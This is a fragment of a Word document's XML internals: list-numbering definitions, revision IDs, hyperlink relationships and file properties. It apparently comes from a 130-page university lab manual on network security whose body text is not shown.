    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C6CC2860"/>
    <w:lvl w:ilvl="0" w:tplc="3DB6DE8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80A89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F30680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DFA55E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B7001A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D78F98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83055A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9AC091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10C601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5CF57934"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="452E64D4"/>
    <w:lvl w:ilvl="0" w:tplc="7F04504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D496A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6A0B00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676D9C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83E1A3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E36C55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158ADD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972C5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42E6CD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5FA2190C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="15662C50"/>
    <w:lvl w:ilvl="0" w:tplc="6A802A0E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="10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0A83C7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572EDB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99EC6B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024CDD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70E461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68CC3F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3A8424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0FA0FC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21B6508"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5F722ABE"/>
    <w:lvl w:ilvl="0" w:tplc="0B0660B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1238B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F4C45B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ECEAD8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A5E4B1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916741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D442BD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7C4E5F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700A66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24B1B80"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4B66EC00"/>
    <w:lvl w:ilvl="0" w:tplc="5C10650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7EA51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79E660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CA21E1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4683BE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848CD3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8F60FB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DA857E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BE27B0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2D2700B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6B8C6A14"/>
    <w:lvl w:ilvl="0" w:tplc="F4A870D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5CCB9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B16089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564E91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5E2CE7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3EC4CF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59E589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BA0C9F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21EA3E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62E07EFC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CCA8CCEE"/>
    <w:lvl w:ilvl="0" w:tplc="4C56D0B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C68A3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8B8EF6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A54FD2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788BA6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A7A7F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356666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382A8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29266A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41B1FF7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D88065B6"/>
    <w:lvl w:ilvl="0" w:tplc="6F462F8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FC981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AD69A6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F90663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F14FFE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6523AF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54A1DA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ECAA94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720C89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5AC3834"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9EEC2DC0"/>
    <w:lvl w:ilvl="0" w:tplc="A9B2883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025B0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D02A44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6C68F6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408088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A76DB3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5F46BE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94CF1D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A2426C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6244AE3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3E3E3878"/>
    <w:lvl w:ilvl="0" w:tplc="A08E10A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BE6E4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484E0A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DEC965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A6CF51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2227A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358B81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96EF48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D6C8AA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7F8552F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="82488634"/>
    <w:lvl w:ilvl="0" w:tplc="1C147EC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FAE9A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9D085C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9F831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696E16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5F832E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DDA4C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C066C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CF4318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B252D7B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="20E2F102"/>
    <w:lvl w:ilvl="0" w:tplc="660AF3D2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="641" w:hanging="281"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="75BC4156">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1620" w:hanging="281"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="DAB8420C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2600" w:hanging="281"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="41D29998">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3580" w:hanging="281"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="EFB0E97A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4560" w:hanging="281"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="B19C3E0E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5540" w:hanging="281"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="F90AAD7C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6520" w:hanging="281"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="00842688">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7500" w:hanging="281"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="B2F6FFBA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8480" w:hanging="281"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="88" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6E132F7A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="18B40314"/>
    <w:lvl w:ilvl="0" w:tplc="64A8ECF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74A43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F2EB48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ED669F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09C1A0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344464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F52FEA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A9CCC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45C05A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6FC35CD4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0DC81B68"/>
    <w:lvl w:ilvl="0" w:tplc="BC70CB8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34E62C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667E4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D574603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029C73B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936E5E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D8EC878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8C38BD2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5A1443C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1C027DD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FD704FE4"/>
    <w:lvl w:ilvl="0" w:tplc="58DEB0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E2FF9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38C1BF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7AC63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BCEF23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2BA7B8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14A7B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4E6DD8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288E5E6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26318A8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="30941C3A"/>
    <w:lvl w:ilvl="0" w:tplc="38EC2312">
      <w:start w:val="16"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="43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E80B8EE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="188AD494">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2440" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="C736E2BA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3440" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="9B28CDC2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4440" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0A9EAA08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 w:tplc="6B202706">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6440" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="8D50A81E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7440" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="220A606C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8440" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="92" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="732D5919"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AB9C2CC6"/>
    <w:lvl w:ilvl="0" w:tplc="0AB2C7B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009B2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E6501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A1259F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C4E084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0D0E9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8DC504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770A86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308268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43A154F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5C06EAEC"/>
    <w:lvl w:ilvl="0" w:tplc="EFC8654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D2787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C4200B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9AC720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B8A060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F10C1B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DA051D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5E4F19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9D4D31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5D96458"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AE045E2A"/>
    <w:lvl w:ilvl="0" w:tplc="C83C62D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10B62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0AE801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AFA9BD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226BC4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9E4CD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048E84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0BEB71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B8421A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604529E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7F265D20"/>
    <w:lvl w:ilvl="0" w:tplc="0948550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E24C0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06A9EF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1600D5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F4AD86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F5EB47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EDC842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BDAC60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50A604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68F1464"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F18E68A6"/>
    <w:lvl w:ilvl="0" w:tplc="3744BD6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1B44CA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D22453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736BE2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A74EBB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B3C25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4F0F5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C3680F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C34379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78E51AF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FBD475FE"/>
    <w:lvl w:ilvl="0" w:tplc="F8CC2D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B05F3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0F883E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F8EA7D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D369A4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00C68A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66800C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62C70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AE014D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BCB685A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0BD8A21A"/>
    <w:lvl w:ilvl="0" w:tplc="4C84E1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E490E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DD6804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392D32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1E64FB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97E076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2C6AEA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332AB5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F62ED4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7D033C23"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="783AE6EA"/>
    <w:lvl w:ilvl="0" w:tplc="3D6E200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684F05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F7A913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BB4403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C5ABAC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4047D6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546076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16EDA7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EA890D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7DDC39F0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D2B88EC8"/>
    <w:lvl w:ilvl="0" w:tplc="FEE67464">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="◻"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360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AB8E1920">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1368" w:hanging="247"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="330005DC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2376" w:hanging="247"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="19CE3896">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3384" w:hanging="247"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="5AC81958">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4392" w:hanging="247"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="98965BD6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5400" w:hanging="247"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="A54A8162">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6408" w:hanging="247"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="0FA0C758">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7416" w:hanging="247"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="FFBC573E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8424" w:hanging="247"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="316150310">
    <w:abstractNumId w:val="91"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="267130235">
    <w:abstractNumId w:val="87"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="116677976">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1346905701">
    <w:abstractNumId w:val="93"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="347485340">
    <w:abstractNumId w:val="62"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1022584901">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1036852662">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1863780709">
    <w:abstractNumId w:val="74"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1597445360">
    <w:abstractNumId w:val="57"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="949629634">
    <w:abstractNumId w:val="61"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1336686798">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="409155533">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="2099060085">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1710565769">
    <w:abstractNumId w:val="78"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="178929803">
    <w:abstractNumId w:val="71"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="348917131">
    <w:abstractNumId w:val="92"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="715083741">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1684893943">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1657340101">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1398437544">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1335692719">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="786512692">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1687320295">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="41489786">
    <w:abstractNumId w:val="69"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="2103601879">
    <w:abstractNumId w:val="89"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1454862751">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="205800357">
    <w:abstractNumId w:val="79"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1558128841">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="44918363">
    <w:abstractNumId w:val="77"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="522323996">
    <w:abstractNumId w:val="52"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="1063287477">
    <w:abstractNumId w:val="94"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="1156604153">
    <w:abstractNumId w:val="55"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="1901397868">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="230896260">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="286205582">
    <w:abstractNumId w:val="54"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="1573156940">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="1290673704">
    <w:abstractNumId w:val="68"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="1041789041">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="1106385815">
    <w:abstractNumId w:val="56"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="1462918724">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="2136291859">
    <w:abstractNumId w:val="60"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="164246077">
    <w:abstractNumId w:val="64"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="827553655">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="44" w16cid:durableId="874074109">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="45" w16cid:durableId="844978087">
    <w:abstractNumId w:val="81"/>
  </w:num>
  <w:num w:numId="46" w16cid:durableId="2066027631">
    <w:abstractNumId w:val="90"/>
  </w:num>
  <w:num w:numId="47" w16cid:durableId="1655640380">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="48" w16cid:durableId="1175145780">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="49" w16cid:durableId="1404646425">
    <w:abstractNumId w:val="65"/>
  </w:num>
  <w:num w:numId="50" w16cid:durableId="485440077">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="51" w16cid:durableId="1608654426">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="52" w16cid:durableId="1040471252">
    <w:abstractNumId w:val="83"/>
  </w:num>
  <w:num w:numId="53" w16cid:durableId="182744956">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="54" w16cid:durableId="286009127">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="55" w16cid:durableId="1708603537">
    <w:abstractNumId w:val="99"/>
  </w:num>
  <w:num w:numId="56" w16cid:durableId="1307081846">
    <w:abstractNumId w:val="85"/>
  </w:num>
  <w:num w:numId="57" w16cid:durableId="742332533">
    <w:abstractNumId w:val="86"/>
  </w:num>
  <w:num w:numId="58" w16cid:durableId="1472017531">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="59" w16cid:durableId="855003544">
    <w:abstractNumId w:val="53"/>
  </w:num>
  <w:num w:numId="60" w16cid:durableId="1596161068">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="61" w16cid:durableId="1031734120">
    <w:abstractNumId w:val="50"/>
  </w:num>
  <w:num w:numId="62" w16cid:durableId="1339818490">
    <w:abstractNumId w:val="76"/>
  </w:num>
  <w:num w:numId="63" w16cid:durableId="419984965">
    <w:abstractNumId w:val="59"/>
  </w:num>
  <w:num w:numId="64" w16cid:durableId="1513958895">
    <w:abstractNumId w:val="58"/>
  </w:num>
  <w:num w:numId="65" w16cid:durableId="1609393336">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="66" w16cid:durableId="1805461352">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="67" w16cid:durableId="1502353463">
    <w:abstractNumId w:val="97"/>
  </w:num>
  <w:num w:numId="68" w16cid:durableId="411437703">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="69" w16cid:durableId="1537354060">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="70" w16cid:durableId="592400386">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="71" w16cid:durableId="560791931">
    <w:abstractNumId w:val="51"/>
  </w:num>
  <w:num w:numId="72" w16cid:durableId="1355690087">
    <w:abstractNumId w:val="82"/>
  </w:num>
  <w:num w:numId="73" w16cid:durableId="776292594">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="74" w16cid:durableId="116144985">
    <w:abstractNumId w:val="95"/>
  </w:num>
  <w:num w:numId="75" w16cid:durableId="1871067801">
    <w:abstractNumId w:val="63"/>
  </w:num>
  <w:num w:numId="76" w16cid:durableId="13964431">
    <w:abstractNumId w:val="70"/>
  </w:num>
  <w:num w:numId="77" w16cid:durableId="159391114">
    <w:abstractNumId w:val="66"/>
  </w:num>
  <w:num w:numId="78" w16cid:durableId="245502620">
    <w:abstractNumId w:val="67"/>
  </w:num>
  <w:num w:numId="79" w16cid:durableId="1936473175">
    <w:abstractNumId w:val="75"/>
  </w:num>
  <w:num w:numId="80" w16cid:durableId="1441681997">
    <w:abstractNumId w:val="72"/>
  </w:num>
  <w:num w:numId="81" w16cid:durableId="1776175642">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="82" w16cid:durableId="1299338423">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="83" w16cid:durableId="812020372">
    <w:abstractNumId w:val="98"/>
  </w:num>
  <w:num w:numId="84" w16cid:durableId="63260743">
    <w:abstractNumId w:val="88"/>
  </w:num>
  <w:num w:numId="85" w16cid:durableId="1414620075">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="86" w16cid:durableId="700516042">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="87" w16cid:durableId="1687370406">
    <w:abstractNumId w:val="96"/>
  </w:num>
  <w:num w:numId="88" w16cid:durableId="71853873">
    <w:abstractNumId w:val="80"/>
  </w:num>
  <w:num w:numId="89" w16cid:durableId="551503969">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="90" w16cid:durableId="1119106380">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="91" w16cid:durableId="1001273407">
    <w:abstractNumId w:val="100"/>
  </w:num>
  <w:num w:numId="92" w16cid:durableId="1922107418">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="93" w16cid:durableId="1285162086">
    <w:abstractNumId w:val="84"/>
  </w:num>
  <w:num w:numId="94" w16cid:durableId="1813592597">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="95" w16cid:durableId="1881894953">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="96" w16cid:durableId="1731490649">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="97" w16cid:durableId="1707675293">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="98" w16cid:durableId="1551914117">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="99" w16cid:durableId="1868517363">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="100" w16cid:durableId="1654985081">
    <w:abstractNumId w:val="73"/>
  </w:num>
  <w:num w:numId="101" w16cid:durableId="30809429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F47"/>
    <w:rsid w:val="000067D7"/>
    <w:rsid w:val="000655E9"/>
    <w:rsid w:val="000A3EA0"/>
    <w:rsid w:val="00195426"/>
    <w:rsid w:val="001B6A76"/>
    <w:rsid w:val="00270D20"/>
    <w:rsid w:val="002A71B5"/>
    <w:rsid w:val="0053138F"/>
    <w:rsid w:val="00541377"/>
    <w:rsid w:val="005B1CAC"/>
    <w:rsid w:val="00626841"/>
    <w:rsid w:val="006C66E3"/>
    <w:rsid w:val="008D5F68"/>
    <w:rsid w:val="008E235C"/>
    <w:rsid w:val="009458AD"/>
    <w:rsid w:val="00984A2B"/>
    <w:rsid w:val="00A16F47"/>
    <w:rsid w:val="00A17285"/>
    <w:rsid w:val="00A86E35"/>
    <w:rsid w:val="00AC0AD7"/>
    <w:rsid w:val="00AF79EE"/>
    <w:rsid w:val="00B563DE"/>
    <w:rsid w:val="00C1187A"/>
    <w:rsid w:val="00CF7CE3"/>
    <w:rsid w:val="00E645FA"/>
    <w:rsid w:val="00F1315B"/>
    <w:rsid w:val="00F7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D154"/>
  <w15:docId w15:val="{341FFD4D-577D-4A7A-BBBF-031995C9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3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C0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A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0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AD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univ.edu/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.snort.org/snort-rules)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www.annauniv.edu/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.snort.org/snort-" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.nstalke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lice_and_Bob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annauniv.edu/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.winpcap.org/install/)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130</Pages>
  <Words>23636</Words>
  <Characters>134727</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>1122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GOKUL1</dc:creator>
  <cp:lastModifiedBy>Bharathwaj Ryder</cp:lastModifiedBy>
  <cp:revision>20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-03-27T17:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-27T18:43:00Z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2010</vt:lpwstr>
  </property>
</Properties>
</file>